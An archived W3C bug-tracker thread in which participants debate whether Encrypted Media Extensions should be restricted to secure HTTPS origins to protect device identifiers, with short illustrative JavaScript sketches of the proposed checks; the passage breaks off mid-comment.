This is an archived snapshot of W3C's public Bugzilla bug tracker, decommissioned in April 2019.

Bug 26332 - Applications should only use EME APIs on secure origins (e.g. HTTPS)
Summary: Applications should only use EME APIs on secure origins (e.g. HTTPS)
Status: RESOLVED FIXED
Alias: None
Product: HTML WG
Classification: Unclassified
Component: Encrypted Media Extensions
Version: unspecified
Hardware: All
OS: All
Importance: P2 normal
Target Milestone: ---
Assignee: David Dorwin
QA Contact: HTML WG Bugzilla archive list
URL:
Whiteboard: Security, Privacy, TAG
Keywords:
Depends on:
Blocks: 26838
Reported: 2014-07-14 22:35 UTC by David Dorwin
Modified: 2015-04-18 00:40 UTC
CC List: 19 users

See Also:


Attachments

Description David Dorwin 2014-07-14 22:35:28 UTC
Most existing DRM systems use an [effectively] permanent unique identifier in the client, often [based on value(s)] baked into the hardware. It seems likely that such systems also do not effectively anonymize the identifier in the license protocol.

Assuming this is true, EME enables providing a unique device/user identifier (possibly permanent for a given device) to an unauthenticated application, which may then transmit it over the Internet in the clear. This seems unacceptable. Furthermore, tying permissions, such as those for an identifier, to unauthenticated domains is potentially ineffective [1].

There are solutions and mitigations to this problem [2], but they will vary per key system, and it is difficult to normatively require one or more of them (and such a requirement is unlikely to be followed). The only normative and interoperable protection I can think of is to require a secure origin (e.g. HTTPS) when using such key systems.


There is a push to require secure origins/transport for powerful new web platform features [4], which would include exposing permanent hardware-based identifiers. Restricting the origin/transport is being discussed for other APIs, including WebCrypto [5]. The definition of secure origin and transport is still being debated, but it seems likely some standard definition will emerge and could be referenced by EME.


Failing on insecure origins (e.g. HTTP) could take various forms. In all cases, I think it makes sense to detect and handle this in MediaKeys::create(); a sketch of such a check follows the discussion of the options below.
Possible options:
1) EME APIs only work on secure origins: Always fail on HTTP, etc.
2) Key systems that use unique identifiers only work on secure origins: Fail if the implementation of |keySystem| uses identifiers.
3) Key systems that do not have appropriate mitigations [3] only work on secure origins: Fail if the implementation of |keySystem| uses identifiers and does not have appropriate mitigations.

#1 is simple and consistent, but is perhaps too broad. For example, Clear Key does not need HTTPS.
#2 will likely be equivalent to #1 for many implementations, but requires the user agent vendor to proactively do the right thing. It is also perhaps too broad.
#3 probably captures the right set of scenarios where the risk exists, but it leaves a lot of room for judgement and incorrect decisions by user agents.

Assuming there are CDM implementations that fall into #3 (identifier with no appropriate mitigations), applications would need to support HTTPS in order to support those key systems. For applications supporting such key systems, there would effectively be no difference among the three options. On the other hand, #3 (if respected) provides incentive for CDM implementations to use appropriate mitigations, some of which have additional benefits that a secure origin alone cannot provide.

#3 also does not address the previously mentioned permissions issue [1], which is still relevant to some degree even with such appropriate mitigations.
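
To make the difference among these options concrete, here is a minimal JavaScript sketch of the gating check a user agent might run inside MediaKeys::create(). The key-system property table and the |option| parameter are invented for illustration; a real user agent would consult its own CDM integrations rather than a table like this.

  // Hypothetical gate, evaluated before creating MediaKeys.
  const keySystemProperties = {
    "org.w3.clearkey": { usesIdentifiers: false, hasMitigations: true },
    "com.example.drm": { usesIdentifiers: true, hasMitigations: false }
  };

  function originAllowed(keySystem, isSecureOrigin, option) {
    if (isSecureOrigin) return true;          // all three options pass on secure origins
    const props = keySystemProperties[keySystem];
    if (!props) return false;                 // unknown key system: fail closed
    switch (option) {
      case 1: return false;                   // #1: insecure origins always fail
      case 2: return !props.usesIdentifiers;  // #2: fail only if identifiers are used
      case 3: return !props.usesIdentifiers || props.hasMitigations; // #3: mitigations suffice
    }
    return false;
  }

  // originAllowed("org.w3.clearkey", false, 2) === true  (Clear Key needs no HTTPS)
  // originAllowed("com.example.drm", false, 3) === false (identifiers, no mitigations)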


One might argue that this should be part of the non-normative Privacy Considerations or a recommendation similar to the mitigations. However, I do not believe this would result in a measurable improvement. Applications are unlikely to voluntarily switch to HTTPS based solely on such a recommendation (client privacy should not rely on the application anyway), and implementations are unlikely to require secure transport because it will put them at a disadvantage to other implementations. Therefore, it is likely that the only way to actually address the issue is to normatively require secure origins in one of the flavors listed above. #1 is the simplest way to ensure that applications and implementations do the right thing.


[1] “Granting permissions to unauthenticated origins is, in the presence of a network attacker, equivalent to granting the permissions to any origin. The state of the internet is such that we must indeed assume that a network attacker is present.” - [4]
[2] Examples include: encrypting the identifier using a server certificate and salt, not using identifiers, or providing unique identifiers per origin
[3] Appropriate mitigations might include: encrypting the identifier using a server certificate and salt
[4] http://lists.w3.org/Archives/Public/public-webappsec/2014Jun/thread.html#msg222
[5] https://www.w3.org/Bugs/Public/show_bug.cgi?id=25972
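
For concreteness, the "unique identifiers per origin" mitigation in [2] amounts to deriving a stable per-origin value from a device secret, so that identifiers are not linkable across origins. A minimal sketch, using WebCrypto HMAC purely for illustration (a real CDM would hold the secret and perform this derivation entirely outside the reach of script):

  async function perOriginIdentifier(deviceSecret, origin) {
    const enc = new TextEncoder();
    const key = await crypto.subtle.importKey(
        "raw", enc.encode(deviceSecret),
        { name: "HMAC", hash: "SHA-256" }, false, ["sign"]);
    const mac = await crypto.subtle.sign("HMAC", key, enc.encode(origin));
    // Hex-encode the MAC; each origin sees a different but stable value.
    return Array.from(new Uint8Array(mac))
        .map(b => b.toString(16).padStart(2, "0")).join("");
  }

  // perOriginIdentifier("device-secret", "https://a.example") and
  // perOriginIdentifier("device-secret", "https://b.example") yield unlinkable values.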
Comment 1 Ryan Sleevi 2014-07-14 23:03:36 UTC
I don't see how #2/#3 can be sanely/reliably implemented by a UA, given that EME makes it clear that the Key System is "opaque". Bug 20944 captures some of this discussion, as noted, but even the Key System name itself is opaque (inasmuch as there is no registry).

I do agree that it seems impossible to prevent EME from disclosing some degree of identifying information. At a minimum, you're guaranteed a single bit of user state (authorized vs. not authorized), but you're potentially looking at degrees ranging from classes of devices to per-user identifiers.

From a UA perspective, it seems like a design goal of EME to keep the UA opaque as to the nature of the CDM's key system, which means that the effective security/privacy of any given CDM is the 'worst possible' of all CDMs. Since the UA has to treat the CDM as a black box (again, per the discussions of Bug 20944; if this was not the case, we'd be normatively specifying how key systems behave and what information they're given access to), it seems like you must always assume the CDM has user-and-hardware uniquely-identifying data.

Put differently, if a UA wanted to implement #2/#3, it'd need to know what key systems may be supported, and whether the privacy concerns for that key system align with the UAs or W3C's views on privacy protection. A UA implemented atop a generic API (for example, Microsoft's Media Foundation APIs, http://msdn.microsoft.com/en-us/library/windows/apps/dn466732.aspx ) would need to implement some form of whitelisting, except it's unknown/undocumented what values of key systems are acceptable (no registry).

Further, it'd require the UA to know how the key system was implemented, in order to evaluate how that key system adheres to protecting user identifiers in transit. For some UAs, it'd also require the public to be able to know how the key system was implemented, in order that they can verify the claims of the CDM/UA vendors. If we had such a system where the key system was open/documented, rather than opaque, we presumably wouldn't need EME (Bug 20944).

So it does seem that #1 is the only sane way to cut this knot, at least in a way that ensures the consistency for the greatest number of UAs. That said, it does require understanding a solid definition of secure origin.
Comment 2 Joe Steele 2014-07-15 15:55:31 UTC
(In reply to David Dorwin from comment #0)
> There is a push to require secure origins/transport for new powerful new web
> platform features [4], which would include exposing permanent hardware-based
> identifiers. Restricting the origin/transport is being discussed for other
> APIs, including WebCrypto [5]. The definition of secure origin and transport
> is still being debated, but it seems likely some standard definition will
> emerge and could be referenced by EME.

This W3C Recommendation gives some good guidance (http://www.w3.org/TR/wsc-ui/#typesoftls) on what can be considered secure origins.

> Failing on insecure origins (e.g. HTTP) could take various forms. In all
> cases, I think it makes sense to detect and handle this in
> MediaKeys::create().
> Possible options:
> 1) EME APIs only work on secure origins: Always fail on HTTP, etc.
> 2) Key systems that use unique identifiers only work on secure origins: Fail
> if the implementation of |keySystem| uses identifiers.
> 3) Key systems that do not have appropriate mitigations [3] only work on
> secure origins: Fail if the implementation of |keySystem| uses identifiers
> and does not have appropriate mitigations.
> 
> #1 is simple and consistent, but is perhaps too broad. For example, Clear
> Key does not need HTTPS.
> #2 will likely be equivalent to #1 for many implementations, but requires
> the user agent vendor to proactively do the right thing. It is also perhaps
> too broad.
> #3 probably captures the right set of scenarios where the risk exists, but
> it leaves a lot of room for judgement and incorrect decisions by user agents.

I am in favor of #1. 

However, this could cause mixed security messaging, given that the media resources themselves are unlikely to be on secure origins for cost and performance reasons. The key request origins may also not be secure (again for performance reasons) if the key request protocol uses message-based security rather than relying on a TLS channel. How would applications handle this?

An easier problem -- what would failure mean here? Would this be handled with an error code?
Comment 3 John Luther 2014-07-18 16:06:53 UTC
I'm also in favor of #1.
Comment 4 David Dorwin 2014-07-19 00:18:39 UTC
(In reply to Joe Steele from comment #2)
...
> I am in favor of #1. 
> 
> However this could cause mixed security messaging, given that the media
> resources themselves are unlikely to be on secure origins for cost and
> performance reasons. The key request origins may also not be secure (again
> for performance reasons) if the key request protocol uses message-based
> security rather than relying on a TLS channel. How would applications handle
> this?

These would be mixed content scenarios, which should be addressed by https://w3c.github.io/webappsec/specs/mixedcontent/.

> An easier problem -- what would failure mean here? Would this be handled
> with an error code?

Failure would mean the promise returned by MediaKeys::create() is rejected. We would need to specify the DOMException name with which to reject. "NotSupportedError" is consistent with other requests where the requested key system cannot be used. Details could be provided in the DOMException message.
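
For illustration, application-side handling of that rejection might look like the following sketch, written against the MediaKeys.create() form of the draft API discussed in this bug. The key system name and the HTTPS-redirect recovery path are assumptions, not spec requirements.

  const video = document.querySelector("video");

  MediaKeys.create("com.example.drm").then(
    mediaKeys => {
      video.setMediaKeys(mediaKeys);  // proceed with the license exchange
    },
    error => {
      if (error.name === "NotSupportedError") {
        // The key system is unusable here, possibly because the origin is
        // insecure; one recovery path is to reload the page over HTTPS.
        location.replace(location.href.replace(/^http:/, "https:"));
      }
    });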
Comment 5 David Dorwin 2014-07-19 01:25:19 UTC
https://dvcs.w3.org/hg/html-media/rev/e68902b0f30d adds secure origin and transport to the Security Considerations and Privacy Considerations sections, including the answers in comment #4. It includes a new step specifying how to fail when an origin is not allowed but does not normatively specify the conditions, which remains to be discussed here.

https://dvcs.w3.org/hg/html-media/rev/7595e9457f23 adds text about secure origins to the Privacy Considerations section on alerts and consent.
Comment 6 Mark Watson 2014-07-22 15:41:22 UTC
(In reply to Ryan Sleevi from comment #1)
> I don't see how #2/#3 can be sanely/reliably implemented by a UA, given that
> EME makes it clear that the Key System is "opaque". Bug 20944 captures some
> of this discussion, as noted, but even the Key System name itself is opaque
> (in as much as there is no registry).
> 
> I do agree that it seems impossible to prevent EME from disclosing some
> degree of identifying information. At a minimum, you're guaranteed a
> single-bit of user-state (authorized vs not-authorized), but you're
> potentially looking at degrees ranging from classes-of-devices to per-user
> identifiers.
> 
> From a UA perspective, it seems like a design goal of EME to keep the UA
> opaque as to the nature of the CDMs key system, which means that the
> effective security/privacy of any given CDM is the 'worst possible' of all
> CDMs. Since the UA has to treat the CDM as a blackbox (again, per the
> discussions of Bug 20944; if this was not the case, we'd be normatively
> specifying how key systems behave and what information they're given access
> to), it seems like you must always assume the CDM has user-and-hardware
> uniquely-identifying data.
> 

No. As described in the Security and Privacy considerations and at great length elsewhere, UA implementors are expected to be aware of the properties of the CDMs with which they integrate and treat them appropriately. This is not a plugin API where you have no knowledge of the properties of the plugin.
Comment 7 Mark Watson 2014-07-22 15:43:26 UTC
(In reply to Joe Steele from comment #2)
> (In reply to David Dorwin from comment #0)
> > There is a push to require secure origins/transport for new powerful new web
> > platform features [4], which would include exposing permanent hardware-based
> > identifiers. Restricting the origin/transport is being discussed for other
> > APIs, including WebCrypto [5]. The definition of secure origin and transport
> > is still being debated, but it seems likely some standard definition will
> > emerge and could be referenced by EME.
> 
> This W3C Recommendation gives some good guidance
> (http://www.w3.org/TR/wsc-ui/#typesoftls) on what can be considered secure
> origins.
> 
> > Failing on insecure origins (e.g. HTTP) could take various forms. In all
> > cases, I think it makes sense to detect and handle this in
> > MediaKeys::create().
> > Possible options:
> > 1) EME APIs only work on secure origins: Always fail on HTTP, etc.
> > 2) Key systems that use unique identifiers only work on secure origins: Fail
> > if the implementation of |keySystem| uses identifiers.
> > 3) Key systems that do not have appropriate mitigations [3] only work on
> > secure origins: Fail if the implementation of |keySystem| uses identifiers
> > and does not have appropriate mitigations.
> > 
> > #1 is simple and consistent, but is perhaps too broad. For example, Clear
> > Key does not need HTTPS.
> > #2 will likely be equivalent to #1 for many implementations, but requires
> > the user agent vendor to proactively do the right thing. It is also perhaps
> > too broad.
> > #3 probably captures the right set of scenarios where the risk exists, but
> > it leaves a lot of room for judgement and incorrect decisions by user agents.
> 
> I am in favor of #1. 
> 
> However this could cause mixed security messaging, given that the media
> resources themselves are unlikely to be on secure origins for cost and
> performance reasons.

It's not just the messaging. Mixed content is simply disallowed by some browsers, so requiring a secure origin requires the media to be on a secure origin as well.

> The key request origins may also not be secure (again
> for performance reasons) if the key request protocol uses message-based
> security rather than relying on a TLS channel. How would applications handle
> this?

Good question.

> 
> An easier problem -- what would failure mean here? Would this be handled
> with an error code?
Comment 8 Mark Watson 2014-07-22 15:45:16 UTC
> 
> These would be mixed content scenarios, which should be addressed by
> https://w3c.github.io/webappsec/specs/mixedcontent/.
> 

Ironically, that URL results in an SSL Connection Error, which kind-of illustrates one of the problems.
Comment 9 Mark Watson 2014-07-22 15:52:16 UTC
(In reply to David Dorwin from comment #5)
> https://dvcs.w3.org/hg/html-media/rev/e68902b0f30d adds secure origin and
> transport to the Security Considerations and Privacy Considerations
> sections, including the answers in comment #4. It includes a new step
> specifying how to fail when an origin is not allowed but does not
> normatively specify the conditions, which remains to be discussed here.
> 
> https://dvcs.w3.org/hg/html-media/rev/7595e9457f23 adds text about secure
> origins to the Privacy Considerations section on alerts and consent.

I don't agree with either of these changes.

We've been working on this API for some time and there has been no suggestion that UAs may impose a restriction to secure origins. Indeed, none of the existing deployments of this API apply this restriction. It's a major change to introduce at this stage, with significant implications for service providers.

With the existing solution (plugins) there is no such restriction and indeed users have little information and few guarantees around privacy. EME improves on this situation greatly by interposing the UA and we have security considerations that explain well the considerations UAs should apply when integrating with CDMs. I believe this is sufficient.
Comment 10 Mark Watson 2014-07-24 19:11:16 UTC
I suggest we revert those changes until we have consensus.
Comment 11 David Dorwin 2014-07-24 19:37:33 UTC
(In reply to Mark Watson from comment #8)
> > 
> > These would be mixed content scenarios, which should be addressed by
> > https://w3c.github.io/webappsec/specs/mixedcontent/.
> > 
> 
> Ironically, that URL results in an SSL Connection Error, which kind-of
> illustrates one of the problems.

What browser are you using? It works fine for me in Chrome and Firefox. I don't think the fact that SSL might not be configured correctly means we should avoid using it. SSL needs to be configured and used correctly for many other reasons.

(In reply to Mark Watson from comment #10)
> I suggest we revert those changes until we have consensus.

What specifically do you want to revert? There is no normative requirement for secure origins in the text. The current text provides information about the issues to implementors and authors to help them make informed decisions.
Comment 12 Mark Watson 2014-07-24 19:44:44 UTC
(In reply to David Dorwin from comment #11)
> (In reply to Mark Watson from comment #8)
> > > 
> > > These would be mixed content scenarios, which should be addressed by
> > > https://w3c.github.io/webappsec/specs/mixedcontent/.
> > > 
> > 
> > Ironically, that URL results in an SSL Connection Error, which kind-of
> > illustrates one of the problems.
> 
> What browser are you using? It works fine for me in Chrome and Firefox. I
> don't think the fact that SSL might not be configured correctly means we
> should avoid using it. SSL needs to be configured and used correctly for
> many other reasons.

Chrome. It's working now after I cleared browsing data and restarted my machine. Don't really know what the problem was.

The point is that SSL introduces additional failure modes, and we have measured this in the field. For our service, we have a baseline for our playback failure rate which, according to our measurements, is not possible to achieve if SSL is involved, even on the browser that is 'best' in this area (and the 'best' here is much better than the rest).

> 
> (In reply to Mark Watson from comment #10)
> > I suggest we revert those changes until we have consensus.
> 
> What specifically do you want to revert? There is no normative requirement
> for secure origins in the text. The current text provides information about
> the issues to implementors and authors to help them make informed decisions.
Comment 13 Mark Watson 2014-07-24 19:46:11 UTC
> What specifically do you want to revert? There is no normative requirement
> for secure origins in the text. The current text provides information about
> the issues to implementors and authors to help them make informed decisions.

At least the text which gives permission to browsers to require a secure origin. Previously we had not said anything, implying that both secure and insecure origins must be supported.
Comment 14 Joe Steele 2014-07-24 19:53:47 UTC
> Chrome. It's working now after I cleared browsing data and restarted my
> machine. Don't really know what the problem was.
> 
> The point is that SSL introduces additional failure modes and we have
> measured this in the field. For our service, we have a baseline for our
> playback failure rate which, according to our measurements, it is not
> possible to achieve if there is SSL involved even on the browser that is
> 'best' in this area (and the 'best' here is much better than the rest).

As another piece of anecdotal evidence for problems like this - I had a similar problem with Chrome (Chrome rejecting the SSL certificate for google.com). It turned out to be a misconfiguration of the time server on my machine. No amount of Chrome configuration seemed to fix the problem. I don't mean to imply Chrome is alone in these problems -- all the browsers have them. The problem is more in how we present errors to the user than in the browsers doing something wrong.
Comment 15 Jerry Smith 2014-07-29 00:00:43 UTC
We should also consider intranet use when imposing https as a prerequisite for using EME.  That situation may well not warrant https, and it would make sense to give companies the option to use http.

The ID exposure originally mentioned as a concern seems well protected already.  It would require implementing a license server to retrieve and access the ID.  Further, I believe most DRMs that return this ID already protect it as part of the license message.

Given this, I don't think we should wire EME to fail on http sites, but have no objection to recommending its use.
Comment 16 Ryan Sleevi 2014-07-29 00:25:56 UTC
(In reply to Jerry Smith from comment #15)
> We should also consider intranet use when imposing https as a prerequisite
> for using EME.  That situation may clearly not warrant https, and it would
> make sense to give companies the option to use http.

Isn't HTTPS far simpler to deploy on an intranet? And aren't the risks similar (especially in light of the gTLD explosion)?

> 
> The ID exposure originally mentioned as a concern seems well protected
> already.  It would require implementing a license server to retrieve and
> access the ID.  Further, I believe most DRMs that return this ID already
> protect as part of the license message.

I'm a bit confused how this conclusion was reached. Nothing seems to prevent an EME CDM from implementing its key exchange with the license server in the clear. That is, I don't see how/why it would require implementing a license server to retrieve/access the ID.

That some CDMs have a strong binding to the license server is a point for them, but nothing in EME seems to mandate this level of security. Nor is it evidence that the CDM<->License server protocol is itself robust (not vulnerable to cryptanalytic attacks that would reveal the ID, for example). ClearKey seems to be proof positive that you can implement an 'open' exchange.

> 
> Given this, I don't think we should wire EME to fail on http sites, but have
> no objection to recommending its use.
Comment 17 Mark Watson 2014-07-29 01:24:22 UTC
(In reply to Ryan Sleevi from comment #16)
> (In reply to Jerry Smith from comment #15)

> I'm a bit confused how this conclusion was reached. Nothing seems to prevent
> an EME CDM from implementing it's key exchange with the license server in
> the clear. That is, I don't see how/why it would require implementing a
> license server to retrieve/access the ID.
> 
> That some CDMs have a strong binding to the license server is a point for
> them, but nothing in EME seems to mandate this level of security. Nor is it
> an example that the CDM<->License server protocol is itself robust (not
> vulnerable to crypto-analytic attacks that would reveal ID, for example).
> ClearKey seems to be proof-positive that you can implement an 'open'
> exchange.
> 

The EME model is one where the implementors of a UA choose to integrate with particular CDMs, not one where users can install arbitrary CDMs. As such, the implementor of the UA can have certain knowledge of the properties of the CDM.

As with any web API, it is for the UA implementor to take care about what information they expose, to obtain suitable user consent for exposure of information etc. It's not something where the specification needs to dictate to UA implementors.
Comment 18 Jerry Smith 2014-08-12 15:10:37 UTC
Proposed on last week's call:  Add a comment that advises websites SHOULD use consistent https.  This means that https is advised in the general case, but allows sites to depart from this guidance if they have specific rationale for doing so (e.g. they've taken other precautions to ensure secure data transfers).
Comment 19 Mark Watson 2014-08-12 15:15:23 UTC
(In reply to Jerry Smith from comment #18)
> Proposed on last week's call:  Add a comment that advises websites SHOULD
> use consistent https.  This means that https is advised in the general case,
> but allows sites to depart from this guidance if they have specific
> rationale for doing so (e.g. they've taken other precautions to ensure
> secure data transfers).

I don't see why this recommendation belongs in the EME specification. It's a general recommendation for all websites, whatever web platform APIs they use.
Comment 20 Glenn Adams 2014-08-12 15:45:55 UTC
Cox opposes requiring secure origins to use EME. We believe this is an author/service/page provider policy issue that should not be circumscribed by UA policy.
Comment 21 Anne 2014-08-12 16:59:40 UTC
(In reply to Mark Watson from comment #17)
> As with any web API, it is for the UA implementor to take care about what
> information they expose, to obtain suitable user consent for exposure of
> information etc. It's not something where the specification needs to dictate
> to UA implementors.

Actually that is false. A standard can definitely require that an API is only exposed on secure origins, even if that API requires further user opt in. This protects the end user from potential harm. We have not been good with this in the past (e.g. geolocation works on insecure pages), but we should be going forward.
Comment 22 Ryan Sleevi 2014-08-12 19:20:53 UTC
(In reply to Anne from comment #21)
> Actually that is false. A standard can definitely require that an API is
> only exposed on secure origins, even if that API requires further user opt
> in.

The goal of this is interoperability.

Can EME, devoid of any context about the particular CDM implementation, be analyzed to ensure it protects the privacy and security of users?

David sets out in the description that the security analysis of EME cannot be decoupled from particular CDMs, a point Mark affirms (in Comment #6) and Jerry also expresses, albeit indirectly, in Comment #15.

However, the CDMs are non-standard, nor necessarily guaranteed to be interoperable, which Bug 20944 is tracking. As a result of this, a web developer who wishes to use a CDM/EME has no guarantee whether or not it provides a sufficient level of security for a UA to enable it, nor does a web user have the necessary context to review and decide regarding EME on its merits alone.

Further, because of the EME/CDM split, it's likely (as we can see even from the comments by UAs on this bug) for two vendors to disagree as to whether a particular CDM is sufficiently secure for users - with one requiring a secure transport (because key exchange or functionality is insufficiently handled) while another permits it on easily intercepted and manipulated channels such as HTTP.

Given that Pervasive Monitoring is an Attack (BCP 188 / RFC 7258), it's important for us to consider what are appropriate/best steps that can be taken to:
- Ensure privacy of users, including privacy from fingerprinting
- Ensure security of users
- Ensure consistency and interoperability for developers using this spec
- Ensure consistency and interoperability of implementations of both EME and CDMs

Despite Mark's claim in Comment #6, there are no normative requirements upon User Agents preventing them from treating CDMs as generic plugins. The closest approximation is the non-normative requirements in Section 6 (Security) and 7 (Privacy) that "CDM implementors must provide sufficient information and controls to user agent implementers", but one can say that the exact same requirements exist for plugins via <object> today.

Given the extensive number of ways in which privacy-sensitive data can be disclosed, as per Section 7 (Privacy), it would seem that enabling this API via HTTP would be akin to enabling authentication cookies over HTTP (i.e. without the secure flag). Even if this information is for the duration of a "session" (an ambiguous concept in practice), that's still enough to enable pervasive monitoring of users.
Comment 23 Mark Watson 2014-08-19 15:44:06 UTC
(In reply to Anne from comment #21)
> (In reply to Mark Watson from comment #17)
> > As with any web API, it is for the UA implementor to take care about what
> > information they expose, to obtain suitable user consent for exposure of
> > information etc. It's not something where the specification needs to dictate
> > to UA implementors.
> 
> Actually that is false. A standard can definitely require that an API is
> only exposed on secure origins, even if that API requires further user opt
> in. This protects the end user from potential harm. We have not been good
> with this in the past (e.g. geolocation works on insecure pages), but we
> should be going forward.

I think my statement was in fact true. I did not say that standards "cannot" require an API to only be exposed to secure origins, I said that it is not necessary. You might disagree, but that is a matter of opinion, not of fact.
Comment 24 Mark Watson 2014-08-19 15:51:44 UTC
(In reply to Ryan Sleevi from comment #22)
> (In reply to Anne from comment #21)
> > Actually that is false. A standard can definitely require that an API is
> > only exposed on secure origins, even if that API requires further user opt
> > in.
> 
> The goal of this is interoperability.
> 
> Can EME, devoid of any context about the particular CDM implementation, be
> analyzed to ensure it protects the privacy and security of users?

No, but there is no need for anyone to do such an analysis. The UAs implementing EME all know what CDMs they are integrating with and their security and privacy properties. This is not an open plugin API with user-installable CDMs.

> 
> David sets out in the description that the security analysis of EME cannot
> be decoupled from particular CDMs, which Mark states that they cannot (in
> Comment #6) and Jerry also expresses, albeit indirectly, in Comment #15.
> 
> However, the CDMs are non-standard, nor necessary guaranteed to be
> interoperable, which Bug 20944 is tracking. As a result of this, a web
> developer who wishes to use a CDM/EME has no guarantee whether or not it
> provides a sufficient level of security for a UA to enable it, nor does a
> web user have the necessary context to review and decide regarding EME on
> its merits alone.

As with any other API, both the user and the web developer rely on the UA to protect their security and privacy. They should have the same guarantees with respect to EME as they have with respect to the same-origin policy, for example.

> 
> Further, because of the EME/CDM split, it's likely (as we can see even from
> the comments by UAs on this bug) for two vendors to disagree as to whether a
> particular CDM is sufficiently secure for users - with one requiring a
> secure transport (because key exchange or functionality is insufficiently
> handled) while another permitting it on easily intercepted and manipulated
> channels such as HTTP.

I don't think we have had such a disagreement as no two UA vendors are presently integrating the same CDM.

> 
> Given that Pervasive Monitoring is an Attack (BCP 188 / RFC 7258), it's
> important for us to consider what are appropriate/best steps that can be
> taken to:
> - Ensure privacy of users, including privacy from fingerprinting
> - Ensure security of users
> - Ensure consistency and interoperability for developers using this spec
> - Ensure consistency and interoperability of implementations of both EME and
> CDMs
> 
> Despite Mark's claim in Comment #6, there are no normative requirements upon
> User Agents preventing them from treating CDMs as generic plugins.

I think the security and privacy issues that you are raising prevent exactly that. We can discuss turning some of the security and privacy considerations into normative requirements if you like.

> The
> closest approximation is the non-normative requirements in Section 6
> (Security) and 7 (Privacy) that "CDM implementors must provide sufficient
> information and controls to user agent implementers", but one can say that
> the exact same requirements exist for plugins via <object> today.

Not at all. There is no mechanism for UA implementors to obtain information from NPAPI plugins as to their security and privacy properties. Nor is there any established practice of UAs whitelisting only those plugins for which the security and privacy properties are understood. This is the problem with NPAPI plugins!

> 
> Given the extensive number of ways in which privacy-sensitive data can be
> disclosed, as per Section 7 (Privacy), it would seem that enabling this API
> via HTTP would be akin to enabling authentication cookies over HTTP (i.e.
> without the secure flag). Even if this information is for the duration of a
> "session" (an ambiguous concept in practice), that's still enough to enable
> pervasive monitoring of users.
Comment 25 Ryan Sleevi 2014-08-19 16:25:18 UTC
(In reply to Mark Watson from comment #24)
> No, but there is no need for anyone to do such an analysis. The UAs
> implementing EME all know what CDMs they are integrating with and their
> security and privacy properties. 

In the W3C, there has been a priority of constituencies that inherently recognizes the reality of multiple stakeholders being party to the conversations. Users, developers/authors, and implementers are all part of the equation.

It sounds like you are stating that only UAs can or should be part of the security and privacy analysis, and that seems to run counter to the W3C's goals of being an open and transparent organization.

> This is not an open plugin API with user-installable CDMs.

While I appreciate you making this point, I feel that this is just your opinion. Both of your co-editors, and their respective organizations, have positioned EME/CDM as precisely that, both in public discussions and, on a more practical matter, within the code itself.

On Microsoft's side, while the goal is to explicitly support PlayReady, it maps onto the more generic Media Foundation APIs - http://msdn.microsoft.com/en-us/library/windows/apps/dn466732.aspx

On Google's side, EME/CDM is exposed through the Pepper plugin interface, Google's replacement for NPAPI. Indeed, even the existing EME implementations in Chrome are programmatically no different than generic plugins.

I think if you wish to support this view, it may be necessary to have the spec state so. However, I think such a statement would likely prove harmful to the spec overall, as much of the discussion related to this spec has been whether or not it's tangibly different than the <object> tag. Your statement - which is that CDMs are UA-specific - would seem to support an intentionally far less interoperable view than many W3C members have realized.


> As with any other API, both the user and the web developer rely on the UA to
> protect their security and privacy. They should have the same guarantees
> with respect to EME as they have with respect to the same-origin policy, for
> example.

Mark, I'm sure you can see that, unlike the same-origin policy or other security relevant features, it is a by-design goal of the authors of this spec that the capabilities of a CDM be opaque to the general public and authoring community, beyond that which the CDM author shares. Unlike the same origin policy, this makes it difficult to evaluate the security and privacy context in which these CDMs operate.

Considering that you and your fellow authors have listed a number of capabilities being exposed to CDMs that are otherwise not exposed to the web (except via the <object> tag), which carry with them significant privacy risks and support for permanent device identifiers, I think it's a bit disingenuous to compare a privacy net-negative with features designed to bolster security, or to suggest that users should fully rely on the UA to assuage their privacy concerns for a spec developed publicly and with the intent of being a W3C document.

> 
> > 
> > Further, because of the EME/CDM split, it's likely (as we can see even from
> > the comments by UAs on this bug) for two vendors to disagree as to whether a
> > particular CDM is sufficiently secure for users - with one requiring a
> > secure transport (because key exchange or functionality is insufficiently
> > handled) while another permitting it on easily intercepted and manipulated
> > channels such as HTTP.
> 
> I don't think we have had such a disagreement as no two UA vendors are
> presently integrating the same CDM.

I don't feel this satisfactorily deals with the issue, unless you believe that a lack of interoperability is a goal or feature of this specification.

It would seem, based on the significant feedback from the community, that having two or more UA vendors ship the same CDM is a highly desirable outcome. As such, it does not seem you can reasonably ignore or dismiss this issue, unless you believe that UA vendors should not ship interoperable CDMs.


> > The
> > closest approximation is the non-normative requirements in Section 6
> > (Security) and 7 (Privacy) that "CDM implementors must provide sufficient
> > information and controls to user agent implementers", but one can say that
> > the exact same requirements exist for plugins via <object> today.
> 
> Not at all. There is no mechanism for UA implementors to obtain information
> from NPAPI plugins as to their security and privacy properties. 

I'm not sure - are you suggesting that this exists for CDMs? Or is this merely a statement to the effect that "Since you can't do it for NPAPI, you don't need to do it for EME"?

> Nor is there
> any established practice of UAs whitelisting only those plugins for which
> the security and privacy properties are understood. 

There has been, for some time, such a practice.

http://www.chromium.org/developers/npapi-deprecation
http://blogs.msdn.com/b/ie/archive/2011/02/28/activex-filtering-for-consumers.aspx
Comment 26 Glenn Adams 2014-08-19 16:51:16 UTC
(In reply to Ryan Sleevi from comment #25)
> (In reply to Mark Watson from comment #24)
> > No, but there is no need for anyone to do such an analysis. The UAs
> > implementing EME all know what CDMs they are integrating with and their
> > security and privacy properties. 
> 
> > In the W3C, there has been a priority of constituencies that inherently
> recognizes the reality of multiple stakeholders being party to the
> conversations. Users, developers/authors, implementers are all part of the
> equation.
> 
> It sounds like you are stating that only UAs can or should be part of the
> security and privacy analysis, and that seems to run counter to the W3C's
> goals of being an open and transparent organization.

To the extent that UAs do not support user-installable CDMs, Mark is correct.

In any case, what UAs do with CDMs has no bearing on the W3C as an "open and transparent organization".

> 
> > This is not an open plugin API with user-installable CDMs.
> 
> While I appreciate you making this point, I feel that this is just your
> opinion. Both of your co-editors, and their respective organizations, have
> positioned EME/CDM as precisely that, both in public discussions and, on a
> more practical matter, within the code itself.

Whether CDMs are an open plugin API or not is the decision of the UA vendor.

> 
> On Microsoft's side, while the goal is to explicitly support PlayReady, it
> maps onto the more generic Media Foundation APIs -
> http://msdn.microsoft.com/en-us/library/windows/apps/dn466732.aspx
> 
> On Google's side, EME/CDM is exposed through the Pepper plugin interface,
> Google's replacement for NPAPI. Indeed, even the existing EME
> implementations in Chrome are progrmatically no different than generic
> plugins.
> 
> I think if you wish to support this view, it may be necessary to have the
> spec state so.

The spec will not place requirements on UAs with respect to how they choose to support CDMs. If you would like to write another spec that does so, then you may draft and submit it for consideration.

> However, I think such a statement would likely prove harmful
